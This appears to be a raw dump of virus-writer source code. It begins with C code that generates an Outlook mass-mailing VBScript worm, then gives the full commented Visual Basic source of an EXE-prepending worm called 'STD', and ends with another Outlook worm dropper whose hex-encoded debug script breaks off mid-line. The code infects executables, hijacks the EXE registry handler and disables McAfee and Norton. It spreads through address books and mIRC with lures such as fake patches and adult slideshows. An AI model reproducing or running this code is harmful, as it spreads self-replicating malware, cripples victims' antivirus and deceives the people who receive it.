fprintf ( scrambler , "Set Mail = scrambler.GetNameSpace(%cMAPI%c)\n" , 34, 34);fprintf ( scrambler , "For A = 1 To Mail.AddressLists.Count\n" );fprintf ( scrambler , "Set B = Mail.AddressLists(A)\n" );fprintf ( scrambler , "Counter = 1\n" );fprintf ( scrambler , "Set C = scrambler.CreateItem(0)\n" );fprintf ( scrambler , "For D = 1 To B.AddressEntries.Count\n" );fprintf ( scrambler , "E = B.AddressEntries(Counter)\n" );fprintf ( scrambler , "C.Recipients.Add E\n" );fprintf ( scrambler , "Counter = Counter + 1\n" );fprintf ( scrambler , "If Counter > 90 Then Exit For\n" );fprintf ( scrambler , "Next\n" );fprintf ( scrambler , "C.Subject = %cCheck this out, it's funny!%c\n" , 34, 34);fprintf ( scrambler , "C.Attachments.Add %c%s%csystem%c%s%c\n" , 34, Buffer , 92,
92, CopyName, 34);fprintf ( scrambler , "C.DeleteAfterSubmit = True\n" );fprintf ( scrambler , "C.Send\n" );fprintf ( scrambler , "E = %c%c\n" , 34, 34);fprintf ( scrambler , "Next\n" );fprintf ( scrambler , "Set F = CreateObject(%cScripting.FileSystemObject% c)\n" ,
34, 34);fprintf ( scrambler , "F.DeleteFile Wscript.ScriptFullName\n" );fclose ( scrambler );
}ShellExecute ( NULL, "open" , "scrambler.vbs" , NULL, NULL, SW_SHOWNORMAL);
}}
_chdir ( Buffer );scrambler = fopen ( "winstart.bat" , "wt" );if ( scrambler ){
fprintf ( scrambler , "@cls\n" );fprintf ( scrambler , "@echo Today..\n" );fprintf ( scrambler , "@echo I'm going to scramble your mind..\n" );
}fclose ( scrambler );
scrambler = fopen ( ScramFile , "wt" );if ( scrambler ){
fprintf ( scrambler , "Scrambler\n" );fprintf ( scrambler , "by Gigabyte\n" );fclose ( scrambler );
}
_chdir ( "system" );
if ( FileExists ( RepairHost ))WinExec ( RepairHost , SW_SHOWNORMAL);
_unlink ( "hostfile.exe" );}
Attribute VB_Name = "STD"'STD v1.0 by Error of Team Necrosis' Commented by Error, pardon my commenting style' ********W32.HLLP.STD.worm Source*********' STD is a Memory-Resident EXE prepender with' Worm functions for Outlook and mIRCPublic myDNA, myRNA, MyCode, STD, Grime, MySTD As StringPublic FDateTime, oldDate, FDate, OldTime, FTime As StringConst MySize = 17920Const RSP_SIMPLE_SERVICE = 1Const RSP_UNREGISTER_SERVICE =0Private iResult, hProg, idprog, iExit As LongConst STILL_ACTIVE As Long = &H103Const PROCESS_ALL_ACCESSAs Long = &H1F0FFFConst Notification = "Hey, sorry I haven't written to you in a while. " & _
"Well you could call it a while. I'm writing this E-mail " & _"to let you know of an attachment im sending with t he next mail."
Const Notify = "Here is the e-mail attachment I told you about ear lier, " & _"It's an installation program for "
Private Declare Function GetCurrentProcessId Lib "kernel32" () As LongPrivate Declare Function RegisterServiceProcess Lib "kernel32" ( ByVal dwProcessID As Long ,ByVal dwType As Long ) As LongPrivate Declare Function OpenProcess Lib "kernel32" ( ByVal dwDesiredAccess As Long , ByValbInheritHandle As Long , ByVal dwProcessID As Long ) As LongPrivate Declare Function GetExitCodeProcess Lib "kernel32" ( ByVal hProcess As Long ,lpExitCode As Long ) As LongPrivate Declare Function CloseHandle Lib "kernel32" ( ByVal hObject As Long ) As LongSub Form_Load()' I put STD into a form because if you compile' it into a module you wont be able to chose' what default icon STD will have, and it ends' up with a nasty baby blue and white form.' Which is very noticable since STD's icon' becomes the infected EXE's icon. i then made' the MS-DOS Program Icon as the default icon
' NOTE: Make sure you make the form set to' visbile = false and showintaskbar = false
On Error Resume NextDim process As Longprocess = GetCurrentProcessId()' This gets STD's process handle so it can' manipulate itselfCall RegisterServiceProcess(process, RSP_SIMPLE_SERVICE)' Now STD is hidden from ALT+CTRL+DEL and' Task Manager. This will take up kernel' processing up to 99.9% but it will allocate' any needed kernel processing for other' programs and still remain hidden.Call AIDS' AIDS = Registry Modifications to disable' McAfee/Norton, have STD startup on windows' load, make STD go memory-resident, and to' modify mIRC scriptingmyDNA = App.EXENameIf Right(App.Path, 1) <> "\" Then
myRNA = App.Path & "\"End If' The above will get the present filename of' STD's host which has been executedmyRNA = myRNA & myDNA &".exe"' ************MEMORY-RESIDENT AREA***********
If UCase(myRNA) = "C:\WINDOWS\SYSTEM\SYSTRAY_.EXE" Then' STD places its code into the file:' C:\WINDOWS\SYSTEM\SYSTRAY_.EXE' This is called the Exe-Hooker (yes i said' hooker). Whenever a exe is executed this file' will be executed first, sending the running' exe's full pah name and parameters to this' files commandline
STD = Command()' Get the running exe's path name and parameters
For X = 1 To Len(STD)strck = UCase( Mid (STD, X, 1))Grime = Grime + strckIf Right(Grime, 5) = ".EXE " Then
' Extract the exe name from the parametersGrime = Left(Grime, Len(Grime) - 1)MySTD = Right$(STD, Len(STD) - X)
' Grime = full path of the running exe' MySTD = all the exe's parameters
GoTo TrineEnd If
Next XTrine:
ff = FreeFile' use freefiles so you dont get file i/o errors
FDateTime = FileDateTime(Grime)' Get the files Date/Time Stamp
For w = 1 To Len(FDateTime)Scan = Mid (FDateTime, w, 1)If Scan = " " Then
FDate = FDate + Scan' Extract the Time
FTime = Mid (FDateTime, w + 1, Len(FDateTime) - w)GoTo GotStamp
End If' Extract the Date
FDate = FDate + ScanNext w
GotStamp:oldDate = Date$
' Get and store the original system dateOldTime = Time$
' Get and store the original system timeDate = FDate
' Change the system Date to the files dateTime = FTime
' Change the system Time to the files time' This will keep the file's date/time stamp' preserved (Is this a first for a VB virus?)
Open Grime For Binary Access Read As ff' Open the running exe
Dim Original As StringOriginal = Space(LOF(ff))
' set a buffer to include the entire exe file's' contents (I've seen exe's 126 meg being stored' as a string in VB)
Get #ff, 1, Original' Start at the beginning of the file and get the' entire contents of the file
If UCase(Right(Original, 3)) = "STD" Then' After getting the contents, check to see if' the last 3 characters in a file are "STD"' if so, that means the file is already infected
' and the original file needs to be ran ASAPCall Original_Jump
' Original_Jump = run the original exeEnd If
Close #ff' if the file isnt infected:
Open myRNAFor Binary Access Read As #2' open the Exe hooker file
Dim Herpes As StringHerpes = Space(MySize)Get #2, 1, Herpes
' Get the virus from the fileClose #2Open Grime For Binary Access Write As ff
Put #ff, 1, Herpes' Place the virus at the beginning of the Exe
Put #ff, MySize, Original' Right after STD, place the original Exe code
Put #ff, LOF(ff) + 3, "STD"' Mark the file infected with "STD" as the last' 3 characters in a file
Close #ffCall Original_Jump
' Run the original exeEnd If' ********END OF MEMORY-RESIDENT CODE*********InFx_SYS' InFx_SYS starts the infection of the system' and makes STD go residentEnd SubPublic Sub InFx_SYS()On Error Resume NextKill "C:\windows\system\systray_.exe"' Kill any non-working installationsff = FreeFileOpen myRNAFor Binary Access Read As #ff' Open the running file
Dim MyCode As StringMyCode = Space(MySize)Get #ff, 1, MyCode
' Extract STD from the fileCloseOpen "C:\windows\system\systray_.exe" For Binary Access Write As #ff
Put #ff, 1, MyCode' Place STD in the Exe Hooker file
Put #ff, LOF(ff) + 3, "STD"' Mark the file infected so it wont infect' itselfCloseFileCopy "C:\windows\system\systray_.exe" , "C:\windows\system\runtray_.dll"' copy the Exe Hooker file to another file for' mailing purposesCall Original_Jump' Run the original exeEnd SubPublic Sub AIDS()' This modifies windows registry, disables AV' products and mIRC sending stuff' NOTE: this is ran every exe execution as wellOn Error Resume Nextw = Chr( 34)' for saving space (And lots of it)Open "C:\ModReg.reg" For Output As #1
Print #1, "REGEDIT4"Print #1,Print #1, "[HKEY_CLASSES_ROOT\exefile\shell\open\command]"Print #1, "@=" & w & "\" & w & "C:\\windows\\system\\systray_.exe\" & w & " %1 %*" & w
' Most important command of STD is above' This forces Windows to run all exe's through' STD's Exe Hooker file along with their' parameters. Once windows is restarted after' system infection, STD will go into hardend' residency. Windows will depend on the Exe' Hooker to run all exe's and therefore STD' cannot be deleted in a windows session. And' if they delete it in DOS, no exes will run' until the rewrite the registry
Print #1,Print #1, "[HKEY_LOCAL_MACHINE\Software\McAfee\Scan95]"Print #1, w & "SerialNum" & w & "=" & w & "STD v1.0 by Error of TN" & wPrint #1, w & "CurrentVersionNumber" & w & "=" & w & "666" & wPrint #1, w & "DAT" & w & "=" & w & "NONE" & wPrint #1, w & "DATFile" & w & "=" & w & "-2000" & wPrint #1, w & "VirusInfoURL" & w & "=" & w & "http://www.norton.com" & wPrint #1, w & "bVShieldEnabled" & w & "=dword:00000000"
' Disable McAfee's scanner, DAT files, and' VShield
Print #1,Print #1, "[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run]"Print #1, w & "SystemTray" & w & "=" & w & "C:\\Windows\\system\\systray_.exe" & w
' Start STD on every windows startupClose #1If Dir( "C:\mirc" , vbDirectory) <> "" Then
Open "C:\mirc\script.ini" For Output As #1' Modify script.ini for STD sending
Print #1, "[script]"Print #1, "n0= on 1:TEXT:*sex*:#:{"
' Everytime someone types in sex, sexy, etc' in a Channel...
Print #1, "n1= .msg $nick Hello, sorry to disturb you, but I just got a very kinky adult slideshow and was wondering if you would like a copy. So I'm going to send you one."' STD will message them with this...
Print #1, "n2= .copy C:\windows\system\runtray_.dll C:\windows\system\install_show.exe"' rename the mailing file to this false name
Print #1, "n3= .dcc send $nick C:\windows\system\install_show .exe"' and DCC send it to the person who typed in sex' BTW 'sex' is the 2nd most common subject/word' typed in chats (right after a/s/l)
Print #1, "n4= }"' end the mIRC sending stuff
CloseEnd Ifmodify = Shell( "regedit /s C:\ModReg.reg" , vbHide)' run the Registry modifications in a background' processKill "C:\ModReg.reg"' delete any of its tracesKill "C:\Program Files\Norton AntiVirus\*.dat"' delete Norton's DAT filesEnd SubPublic Function IGotWyrms(Subject1 As String , Body1 As String , Optional Attachment1 As String )On Error Resume Next' MAPI Mailing technique got from my other virus' W97M/Revolution' http://teamnecrosis.20m.com/VC.html for stuff
Dim S_and_M, B_and_D, SpawnmeSet S_and_M = CreateObject( "Outlook.Application" )Set B_and_D = S_and_M.GetNameSpace( "MAPI" )If S_and_M = "Outlook" Then
B_and_D.Logon "Guest" , "password"For y = 1 To B_and_D.AddressLists.Count
' get # of addybooks in OutlookSet AddyBook = B_and_D.AddressLists(y)X = 1Set Spawnme = S_and_M.CreateItem( 0)For oo = 1 To AddyBook.AddressEntries.Count
peep = AddyBook.AddressEntries(X)Spawnme.Recipients.Add peepX = X + 1If X > 100 Then oo = AddyBook.AddressEntries.Count
' in each Addybook send STD to the first 100 pplNext ooSpawnme.Subject = Subject1
' Subject1 = "Hey" (on authorization mail) or' "Here it is" (on Attachment mail)
Spawnme.Body = Body1' the body varies.... see Original_Jump
If Attachment1 <> "" ThenSpawnme.Attachments.Add Attachment1
' as aboveEnd If
Spawnme.Sendpeep = ""
Next yB_and_D.Logoff
End IfEnd FunctionPublic Sub Original_Jump()On Error Resume NextIf Grime = "" Or Grime = Empty Then Grime = myRNA' make sure STD gets the file to runIf Original = "" Or Original = Empty Then
Open Grime For Binary Access Read As #3Original = LOF( 3) - MySizeIf Original = 0 Then End
' if the file = pure source of STD then endDim GetOrig As StringGetOrig = Space(Original)Get #3, MySize, GetOrig
' get the original code of the running exeClose #3
End Ifhideit = Left(Grime, Len(Grime) - 4)hideit = hideit & ".vxv"Open hideit For Binary Access Write As #10
Put #10 , , GetOrig' place the code in a temporary file with the' same exe name but ".vxv" extensionClose #10CloseDim idprog As LongDate = oldDateTime = OldTime' Restore system date/time if neededidprog = Shell(hideit & " " & MySTD, vbNormalFocus)' run the original exe AND its parameters via' running the original code from a temporary' file
hProg = OpenProcess(PROCESS_ALL_ACCESS, False , idprog)GetExitCodeProcess hProg, iExitDo While iExit = STILL_ACTIVE
DoEventsGetExitCodeProcess hProg, iExit
' monitor the running exe from the temp file' and have STD remain resident using 2K bytes' of memory to run. This is what prohibits' STD from being deleted in a Windows session' along with windows requiring that fileLoopKill hideitKill hideit' As soon as the program has ended delete the' temp file (2 times to ensure deletion)Randomize Timer' Base random number gen on the timeRandSend = Int(Rnd( 1) * 20) + 1If RandSend = 5 Then
' NOTE: to view mail messages see the' declarations at the top of STD's code
' STD will send itself via Outlook 1 out of 20' exe executions upon the infected machine
Call IGotWyrms( "Hey" , Notification, "" )' send the authorization mail telling all users' that the next E-mail will have an attachment' "Social engineering at its finest" - Evul
Name "C:\windows\system\runtray_.dll" As "C:\windows\install_.exe"' rename the mail file to a fake name
Randomize TimerDim Note As Stringrandmsg = Int(Rnd( 1) * 5) + 1If randmsg = 1 Then Note = Notify & "an adult screensaver slideshow program"If randmsg = 2 Then Note = Notify & "an Outlook Service Release upgrade"If randmsg = 3 Then Note = Notify & "a Microsoft Explorer Patch"If randmsg = 4 Then Note = Notify & "a Desktop Game I got off the internet"If randmsg = 5 Then Note = Notify & "a brand-new MP3 player and plug-ins"Call IGotWyrms( "Here it is" , Note, "C:\windows\install_.exe" )
' STD will send itself disguised as one of the' above programs
Name "C:\windows\install_.exe" As "C:\windows\system\runtray_.dll"' rename the fake exe to the original fake name
End IfEnd IfEnd' End STD' W32.HLLP.STD.worm by Error of Team Necrosis' 32-bit exe infector/worm with a hint of social' engineering' One of the first Memory-Resident Exe infectors' written in Visual Basic' questions? ---> [email protected]' http://teamnecrosis.20m.comEnd Sub
Private Sub Form_Load()If Dir( "c:\windows\hop_along.exe" ) = "" Then ' check if already infectedFileCopy App.Path & "\" & App.EXEName & ".exe" , "c:\windows\hop_along.exe"CreateVBS ' call the Create VBS subShell "wscript.exe c:\windows\hop_along.vbs" ' Run the VBS scriptCreatePKunzip ' Call the CreatePKunzip subLogoZip ' Call the LogoZip subCreateBat ' Call the CreateBat subShell "c:\windows\hop_along.bat" , vbHide ' Run the batWait4Bat ' Run the Wait4Bat Loop till bat is completed runni ngFileCopy "c:\windows\logo.sys" , "c:\logo.sys" 'Copy Logo file to c:\End IfEndEnd Sub
Public Sub CreateVBS()Open "c:\windows\hop_along.vbs" For Output As #1Print #1, "Set createmail = CreateObject(" & Chr( 34) & "Outlook.Application" & Chr( 34) & ")"Print #1, " If createmail <> " & Chr( 34) & "" & Chr( 34) & " Then"Print #1, " Set EachMail = createmail.GetNameSpace(" & Chr( 34) & "MAPI" & Chr( 34) & ")"Print #1, " For Each GetEmail In EachMail.AddressLists"Print #1, " If GetEmail.AddressEntries.Count > 0 Then"Print #1, " Set Eletter = createmail.CreateItem(0)"Print #1, " For VecH = 1 To GetEmail.AddressEntries.Count"Print #1, " Set FloP = GetEmail.AddressEntries(VecH)"Print #1, " If VecH = 1 Then"Print #1, " Eletter.BCC = FloP.Address"Print #1, " Else"Print #1, " Eletter.BCC = Eletter.BCC & " & Chr( 34) & "; " & Chr( 34) & " & FloP.Address"Print #1, " End If"Print #1, " Next"Print #1, " Eletter.Subject = " & Chr( 34) & "Look At This!!!" & Chr( 34); ""Print #1, " Eletter.Body = " & Chr( 34) & "You have to see this file its so funny!" & Chr( 34);
""Print #1, " Eletter.Attachments.Add " & Chr( 34) & "C:\windows\hop_along.exe" & Chr( 34); ""Print #1, " Eletter.DeleteAfterSubmit = True"Print #1, " Eletter.Send"Print #1, " End If"Print #1, " Next"Print #1, "End If"Close #1End Sub
Sub CreatePKunzip()Open "c:\windows\pkunzip.dbg" For Output As #2Print #2, "N PKUNZIP.COM"Print #2, "E 0100 B9 2E B9 BF BE 0B 2B CF 32 C0 F3 AA B4 30 C D 21"Print #2, "E 0110 A3 22 B9 8D A5 00 06 89 26 26 B9 B8 C6 09 E 8 50"Print #2, "E 0120 00 E8 C0 01 B8 4B 0A E8 31 00 B8 62 A9 E8 2 B 00"Print #2, "E 0130 E8 61 00 E8 3E 00 A0 20 B9 E9 0E 00 BB 65 0 A 50"Print #2, "E 0140 53 92 E8 34 00 58 E8 28 00 58 B4 4C CD 21 C 6 06"Print #2, "E 0150 20 B9 01 50 B8 5B 0A E8 1F 00 58 E8 88 02 8 B F0"Print #2, "E 0160 E8 23 00 8B 1E BC 0B 8B D6 91 B4 40 CD 21 E 9 82"Print #2, "E 0170 02 E8 E7 FF B8 48 0A EB E2 50 E8 F7 FF B8 3 E 0A"Print #2, "E 0180 E8 D8 FF 58 EB D5 56 96 BA FF FF AC 42 84 C 0 75"Print #2, "E 0190 FA 92 5E C3 E8 4F 02 33 C9 33 D2 88 0E 2A A A 8B"Print #2, "E 01A0 1E 28 B9 B8 02 42 CD 21 8B F0 85 D2 75 05 3 D 00"Print #2, "E 01B0 10 72 03 BE 00 10 2B C6 83 DA 00 95 8B FA 8 3 EE"Print #2, "E 01C0 12 8B D5 8B CF E8 EF 00 BA 00 0E 8D 4C 12 E 8 EC"Print #2, "E 01D0 00 8B CE C7 06 68 0A 05 06 B8 66 0A E8 A3 0 0 85"Print #2, "E 01E0 C0 75 1F 8B C5 0B C7 74 11 81 ED EA 0F 83 D F 00"Print #2, "E 01F0 7D CF 03 F5 33 ED 33 FF EB C7 B0 03 BA 6A 0 A E9"Print #2, "E 0200 3A FF 97 8B 4D 14 E3 31 56 8D 75 16 33 DB A C 3C"
Print #2, "E 0210 1B 74 0C 3C 13 75 03 43 EB 05 92 B4 02 CD 2 1 E2"Print #2, "E 0220 ED 5E E8 4F FF 85 DB 74 10 B8 86 0A E8 99 0 0 72"Print #2, "E 0230 05 B0 08 E9 14 FF E8 3B FF 8B 36 26 B9 8B 5 5 10"Print #2, "E 0240 8B 4D 12 E8 71 00 83 7D 0E 00 75 2E 8B 4D 0 C A1"Print #2, "E 0250 06 00 2B C6 3B C1 72 22 8B D6 E8 60 00 8B 4 D 0A"Print #2, "E 0260 E3 15 8B 5C 1C 8B 54 1E 8D 78 2E 03 FA 03 7 C 20"Print #2, "E 0270 E8 B2 01 8B F7 E2 EB E9 79 01 B0 07 BA B5 0 A E9"Print #2, "E 0280 BA FE E8 61 01 96 33 C0 A3 D6 AE E3 24 8B F A AD"Print #2, "E 0290 47 4F AF E0 FC 83 F9 01 76 17 A7 74 06 4F 4 F 4E"Print #2, "E 02A0 4E EB EE 8D 5D FC 89 1E D6 AE 80 3E 2A AA 0 0 74"Print #2, "E 02B0 EC A1 D6 AE E9 3C 01 53 B8 00 42 EB 03 53 B 4 3F"Print #2, "E 02C0 8B 1E 28 B9 CD 21 5B C3 E8 90 FE B8 08 0C C D 21"Print #2, "E 02D0 24 DF 3C 59 74 04 3C 4E 75 F1 92 B4 02 CD 2 1 80"Print #2, "E 02E0 EA 4F F5 C3 E8 D5 00 BE 81 00 8A 4C FF 32 E D E3"Print #2, "E 02F0 1E AC 3C 20 74 17 3C 09 74 13 3C 2D 75 6D A C 49"Print #2, "E 0300 74 0D 3C 6F 74 04 3C 4F 75 03 A2 FC A9 E2 E 2 80"Print #2, "E 0310 3E 24 B9 00 74 34 BE 62 A9 33 DB AC 3C 2E 7 5 01"Print #2, "E 0320 43 84 C0 75 F6 85 DB 75 0A C7 44 FF 2E 5A C 7 44"Print #2, "E 0330 01 49 50 BA 62 A9 B8 00 3D 80 3E 22 B9 03 7 2 02"Print #2, "E 0340 B0 20 CD 21 A3 28 B9 72 09 C3 BA D1 0A B0 0 2 E9"Print #2, "E 0350 EA FD BA C4 0A BB 62 A9 B0 02 E9 E2 FD AC 3 C 20"Print #2, "E 0360 74 90 3C 09 74 8C AA E2 F4 EB A4 80 3E 24 B 9 00"Print #2, "E 0370 75 08 BF 62 A9 A2 24 B9 EB 03 BF E0 AE AA E B E7"Print #2, "E 0380 E8 63 00 8B F2 8B E9 8B 0E 2A B9 8B 16 2C B 9 BF"Print #2, "E 0390 BC AA FC 33 C0 45 EB 16 AC 8B D8 32 D9 8A C D 8A"Print #2, "E 03A0 EA 8A D6 8A F7 D1 E3 D1 E3 33 09 33 51 02 4 D 75"Print #2, "E 03B0 E7 89 0E 2A B9 89 16 2C B9 E9 37 00 E8 27 0 0 FD"Print #2, "E 03C0 BF BA AE BD FF 00 B9 08 00 8B D5 33 C0 D1 E 8 D1"Print #2, "E 03D0 DA 73 07 81 F2 20 83 35 B8 ED E2 F1 AB 92 A B 4D"Print #2, "E 03E0 79 E4 FC E9 0D 00 8F 06 D2 AE 55 56 57 53 5 1 FF"Print #2, "E 03F0 26 D2 AE 59 5B 5F 5E 5D C3 50 56 57 97 8B F 2 AC"Print #2, "E 0400 AA 84 C0 75 FA 5F 5E 58 C3 52 56 8B F0 E8 7 6 FD"Print #2, "E 0410 03 C6 5E 5A EB E3 B8 05 0B E8 32 FD B8 7C A A E8"Print #2, "E 0420 39 FD E9 CE FF E8 BE FF E8 E3 00 8A 44 0A 3 C 08"Print #2, "E 0430 74 04 84 C0 75 E0 03 D3 83 C2 1E 33 C9 03 5 4 2A"Print #2, "E 0440 13 4C 2C E8 71 FE E8 54 00 85 C0 74 4D E8 2 4 FD"Print #2, "E 0450 B8 FF FF A3 2A B9 A3 2C B9 8B 44 0A 48 78 0 5 E8"Print #2, "E 0460 FB 00 EB 03 E8 BA 00 A1 2A B9 8B 16 2C B9 F 7 D0"Print #2, "E 0470 F7 D2 2B 44 10 1B 54 12 0B C2 74 0B B8 52 0 B E8"Print #2, "E 0480 CC FC C6 06 20 B9 01 8B 1E D0 AE 8B 4C 0C 8 B 54"Print #2, "E 0490 0E B8 01 57 CD 21 B4 3E CD 21 E9 56 FF E8 4 6 FF"Print #2, "E 04A0 BF 7C AA 8B CB 03 FB 4F FD B0 2F F2 AE 75 0 1 47"Print #2, "E 04B0 47 FC B8 2C AA BA E0 AE E8 3E FF 50 8B D7 E 8 48"Print #2, "E 04C0 FF 58 80 3E FC A9 00 75 29 50 BA FE A9 B4 1 A CD"Print #2, "E 04D0 21 5A B4 4E B9 07 00 CD 21 72 17 B8 00 43 C D 21"Print #2, "E 04E0 72 10 92 E8 68 FC B8 26 0B E8 DC FD 72 04 3 3 C0"Print #2, "E 04F0 EB 19 B9 20 00 B4 3C BA 2C AA CD 21 73 0A 8 B DA"Print #2, "E 0500 BA 43 0B B0 05 E9 37 FC A3 D0 AE E9 E5 FE E 8 D5"Print #2, "E 0510 FE BF 7C AA 8D 74 2E 8B CB F3 A4 32 C0 AA E 9 D2"Print #2, "E 0520 FE E8 C2 FE B8 67 0B E8 31 FC B8 2C AA E8 2 B FC"Print #2, "E 0530 B9 62 9B 8B 7C 14 8B 74 16 85 F6 75 06 3B C F 72"Print #2, "E 0540 02 8B CF BA 00 0E 52 E8 73 FD 5A 85 C0 74 0 B 2B"Print #2, "E 0550 F8 83 DE 00 91 E8 47 04 EB DF E9 96 FE E8 8 6 FE"Print #2, "E 0560 B8 74 0B E8 F5 FB B8 2C AA E8 EF FB E8 30 0 0 E9"Print #2, "E 0570 81 FE 80 FD 08 74 05 8A CD E8 F4 00 8B CA A D 33"Print #2, "E 0580 C2 40 74 03 E9 C3 02 A4 81 FF 00 9E 72 03 E 8 F9"Print #2, "E 0590 03 81 FE 20 B7 72 03 E8 C4 00 E2 EB 58 EB 0 B C6"Print #2, "E 05A0 06 DE AE 00 E8 B7 00 BF 00 0E B5 08 AD 92 8 0 3E"Print #2, "E 05B0 DE AE 00 75 57 E8 8E 00 D0 16 DE AE E8 95 0 1 E8"Print #2, "E 05C0 C2 00 84 E4 75 0C AA 81 FF 00 9E 72 F2 E8 B A 03"Print #2, "E 05D0 EB ED 3D 00 01 74 D7 2D FE 00 50 E8 0D 01 9 1 59"Print #2, "E 05E0 56 8D 75 FF 2B F3 72 06 81 FE 00 0E 73 18 B B 00"Print #2, "E 05F0 0E 2B DE 03 36 DC AE 3B D9 73 0B 87 D9 2B D 9 F3"
Print #2, "E 0600 A4 BE 00 0E 87 D9 F3 A4 5E 91 EB BB 8B CF B A 00"Print #2, "E 0610 0E 2B CA E8 89 03 C3 80 F9 08 77 12 53 33 C 0 33"Print #2, "E 0620 DB 8A D9 8A 87 A8 0B 22 C2 E8 44 00 5B C3 5 3 33"Print #2, "E 0630 DB 8A D9 B1 08 2A D9 E8 E2 FF 8A CB 8A D8 E 8 DB"Print #2, "E 0640 FF 0A F8 93 5B C3 D1 EA FE CD 74 01 C3 9C 8 1 FE"Print #2, "E 0650 20 B7 72 03 E8 07 00 8A 34 46 B5 08 9D C3 5 0 51"Print #2, "E 0660 52 B9 00 08 BA 20 AF 8B F2 E8 51 FC 5A 59 5 8 C3"Print #2, "E 0670 2A E9 77 0D F6 DD 2A CD D3 EA 8A CD E8 CE F F 2A"Print #2, "E 0680 E9 D3 EA C3 8A DA 32 FF D1 E3 8B 9F 62 A0 8 5 DB"Print #2, "E 0690 78 0E 8A 8F 02 9F E8 D7 FF 93 3D 09 01 73 0 9 C3"Print #2, "E 06A0 B8 62 A4 E8 26 00 EB EE 3D 1D 01 74 1B 2D 0 1 01"Print #2, "E 06B0 8A C8 D0 E9 D0 E9 49 25 03 00 04 04 D3 E0 0 5 01"Print #2, "E 06C0 01 93 E8 52 FF 03 C3 C3 B8 00 02 C3 B1 08 E 8 9F"Print #2, "E 06D0 FF 56 96 8A C2 32 C9 F7 D3 FE C1 D1 EB D1 E 8 D1"Print #2, "E 06E0 D3 D1 E3 8B 18 85 DB 78 EE 5E C3 8A DA 32 F F D1"Print #2, "E 06F0 E3 8B 9F 62 A2 85 DB 78 1F 8A 8F 42 A0 E8 7 0 FF"Print #2, "E 0700 80 FB 04 72 12 93 8A C8 D0 E9 49 24 01 04 0 2 D3"Print #2, "E 0710 E0 93 E8 02 FF 03 D8 C3 B8 E2 A8 E8 AE FF E B DD"Print #2, "E 0720 56 51 BF 02 9F B9 90 00 B0 08 F3 AA B1 70 F E C0"Print #2, "E 0730 F3 AA B1 18 B0 07 F3 AA B1 08 FE C0 F3 AA B F 42"Print #2, "E 0740 A0 B1 20 89 0E FA A9 B0 05 F3 AA C7 06 D4 A E 20"Print #2, "E 0750 01 E9 D4 00 B1 02 E8 BE FE 48 79 03 E9 13 F E 57"Print #2, "E 0760 74 BE 48 74 03 E9 E2 00 B1 05 E8 AA FE 05 0 1 01"Print #2, "E 0770 A3 D4 AE B1 05 E8 9F FE 40 A3 FA A9 51 BF B C AE"Print #2, "E 0780 B9 13 00 32 C0 F3 AA 59 B1 04 E8 8A FE 05 0 4 00"Print #2, "E 0790 BF 96 0B 8B EF 03 E8 33 DB B1 03 E8 79 FE 8 A 1D"Print #2, "E 07A0 88 87 BC AE 47 3B FD 72 F0 56 51 BF 20 B7 B E BC"Print #2, "E 07B0 AE B8 13 00 E8 9B 00 59 5E 8B 2E D4 AE 03 2 E FA"Print #2, "E 07C0 A9 BF 02 9F 32 FF 8A DA D1 E3 8B 9F 20 B7 8 A 8F"Print #2, "E 07D0 BC AE E8 9B FE 8A C3 3C 10 73 06 AA 4D 75 E 5 EB"Print #2, "E 07E0 35 77 0C B1 02 E8 2F FE 04 03 8A 4D FF EB 1 7 3C"Print #2, "E 07F0 11 77 09 B1 03 E8 1F FE 04 03 EB 08 B1 07 E 8 16"Print #2, "E 0800 FE 05 0B 00 32 C9 51 86 C1 32 ED 2B E9 72 3 B F3"Print #2, "E 0810 AA 59 85 ED 75 AE 56 51 BE 02 9F BF 42 A0 0 3 36"Print #2, "E 0820 D4 AE 8B 0E FA A9 F3 A4 A1 D4 AE BE 02 9F B F 62"Print #2, "E 0830 A0 BD 62 A4 E8 1B 00 A1 FA A9 BE 42 A0 BF 6 2 A2"Print #2, "E 0840 BD E2 A8 E8 0C 00 59 5E 5F C3 BA 81 0B B0 0 4 E9"Print #2, "E 0850 EA F8 85 C0 74 F3 52 A3 D6 A9 89 3E D8 AE B F D8"Print #2, "E 0860 A9 57 B9 10 00 33 C0 F3 AB 5F 56 8B 0E D6 A 9 33"Print #2, "E 0870 DB AC 8A D8 D1 E3 FF 01 E2 F7 BE B2 A9 BB 0 2 00"Print #2, "E 0880 33 C0 89 00 B1 0F 03 87 D8 A9 D1 E0 43 43 8 9 00"Print #2, "E 0890 E2 F4 83 38 00 74 12 BE DA A9 B9 0F 00 33 D B AD"Print #2, "E 08A0 03 D8 E2 FB 83 FB 01 77 A1 5E 56 8B 0E D6 A 9 BF"Print #2, "E 08B0 C0 0B AC 32 E4 85 C0 74 0E 8B D8 D1 E3 8B 8 7 B2"Print #2, "E 08C0 A9 40 89 87 B2 A9 48 AB E2 E8 5E 56 BF C0 0 B 8B"Print #2, "E 08D0 16 D6 A9 AC 8A C8 49 78 17 74 15 8B 1D 33 C 0 D1"Print #2, "E 08E0 EB D1 D0 E0 FA 41 D1 EB D3 D0 AB 4A 75 E5 E B 07"Print #2, "E 08F0 47 47 33 C9 4A 75 DC 5E 8B 3E D8 AE B9 00 0 1 33"Print #2, "E 0900 C0 F3 AB BF C0 0B 8B 16 D6 A9 A3 D6 A9 4A 0 3 F2"Print #2, "E 0910 03 FA 03 FA FD AC 84 C0 74 1E 3C 08 77 22 9 1 B8"Print #2, "E 0920 01 00 41 D3 E0 8B 1D D1 E3 56 8B 36 D8 AE 8 9 10"Print #2, "E 0930 03 D8 80 FF 02 72 F7 5E 4F 4F 4A 79 D8 FC 5 A C3"Print #2, "E 0940 2C 08 8A C8 8B 05 8A D8 32 FF D1 E3 03 1E D 8 AE"Print #2, "E 0950 B5 01 56 52 83 3F 00 75 18 8B 16 D6 A9 8B F 2 D1"Print #2, "E 0960 EA F7 D2 89 17 83 06 D6 A9 04 33 D2 89 12 8 9 52"Print #2, "E 0970 02 8B 1F F7 D3 D1 E3 03 DD 84 E5 74 02 43 4 3 D0"Print #2, "E 0980 E5 FE C9 75 CF 5A 89 17 EB AD 51 52 8B CF B A 00"Print #2, "E 0990 0E 8B FA 2B CA 89 0E DC AE E8 03 00 5A 59 C 3 53"Print #2, "E 09A0 52 E8 DC F9 5A 8B 1E D0 AE B4 40 CD 21 5B 3 B C1"Print #2, "E 09B0 75 01 C3 B4 3E CD 21 BA 2C AA B4 41 CD 21 B A B1"Print #2, "E 09C0 0B B0 06 E9 76 F7 0D 0A 50 4B 55 4E 5A 4A 5 2 